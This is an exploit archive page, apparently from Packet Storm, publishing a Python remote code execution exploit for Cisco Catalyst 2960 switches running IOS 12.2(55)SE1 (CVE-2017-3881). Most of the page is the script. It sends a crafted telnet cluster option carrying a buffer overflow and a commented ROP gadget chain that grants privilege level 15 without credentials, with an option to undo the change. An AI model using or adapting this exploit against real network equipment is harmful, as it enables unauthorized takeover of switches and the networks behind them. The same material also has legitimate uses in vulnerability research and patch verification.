seeing is believing

Cisco Catalyst 2960 IOS 12.2(55)SE1 Remote Code Execution

Cisco Catalyst 2960 IOS 12.2(55)SE1 Remote Code Execution
Posted Apr 13, 2017
Authored by Artem Kondratenko

Cisco Catalyst 2960 with IOS version 12.2(55)SE1 ROCEM remote code execution exploit.

tags | exploit, remote, code execution
systems | cisco, ios
advisories | CVE-2017-3881
MD5 | 3a6c0e64cf90f6b40458df2e040554da

Cisco Catalyst 2960 IOS 12.2(55)SE1 Remote Code Execution

Change Mirror Download
#!/usr/bin/python
# Author:
# Artem Kondratenko (@artkond)

import socket
import sys
from time import sleep

set_credless = True

if len(sys.argv) < 3:
print sys.argv[0] + ' [host] --set/--unset'
sys.exit()
elif sys.argv[2] == '--unset':
set_credless = False
elif sys.argv[2] == '--set':
pass
else:
print sys.argv[0] + ' [host] --set/--unset'
sys.exit()


s = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 23))

print '[+] Connection OK'
print '[+] Recieved bytes from telnet service:', repr(s.recv(1024))
#sleep(0.5)
print '[+] Sending cluster option'

print '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'



payload = '\xff\xfa\x24\x00'
payload += '\x03CISCO_KITS\x012:'
payload += 'A' * 116
payload += '\x00\x00\x37\xb4' # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
#next bytes are shown as offsets from r1
payload += '\x02\x2c\x8b\x74' # +8 address of pointer to is_cluster_mode function - 0x34
if set_credless is True:
payload += '\x00\x00\x99\x80' # +12 set address of func that rets 1
else:
payload += '\x00\x04\xea\x58' # unset
payload += 'BBBB' # +16(+0) r1 points here at second gadget
payload += '\x00\xdf\xfb\xe8' # +4 second gadget address 0x00dffbe8: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;
payload += 'CCCC' # +8
payload += 'DDDD' # +12
payload += 'EEEE' # +16(+0) r1 points here at third gadget
payload += '\x00\x06\x78\x8c' # +20(+4) third gadget address. 0x0006788c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr;
payload += '\x02\x2c\x8b\x60' # +8 r1+8 = 0x022c8b60
payload += 'FFFF' # +12
payload += 'GGGG' # +16(+0) r1 points here at fourth gadget
payload += '\x00\x6b\xa1\x28' # +20(+4) fourth gadget address 0x006ba128: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
if set_credless:
payload += '\x00\x12\x52\x1c' # +8 address of the replacing function that returns 15 (our desired privilege level). 0x0012521c: li r3, 0xf; blr;
else:
payload += '\x00\x04\xe6\xf0' # unset
payload += 'HHHH' # +12
payload += 'IIII' # +16(+0) r1 points here at fifth gadget
payload += '\x01\x48\xe5\x60' # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
payload += 'JJJJ' # +8 r1 points here at third gadget
payload += 'KKKK' # +12
payload += 'LLLL' # +16
payload += '\x01\x13\x31\xa8' # +20 original execution flow return addr
payload += ':15:' + '\xff\xf0'

s.send(payload)

print '[+] All done'

s.close()

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    15 Files
  • 2
    Oct 2nd
    16 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    11 Files
  • 6
    Oct 6th
    6 Files
  • 7
    Oct 7th
    2 Files
  • 8
    Oct 8th
    1 Files
  • 9
    Oct 9th
    13 Files
  • 10
    Oct 10th
    16 Files
  • 11
    Oct 11th
    15 Files
  • 12
    Oct 12th
    23 Files
  • 13
    Oct 13th
    13 Files
  • 14
    Oct 14th
    12 Files
  • 15
    Oct 15th
    2 Files
  • 16
    Oct 16th
    16 Files
  • 17
    Oct 17th
    16 Files
  • 18
    Oct 18th
    14 Files
  • 19
    Oct 19th
    8 Files
  • 20
    Oct 20th
    7 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close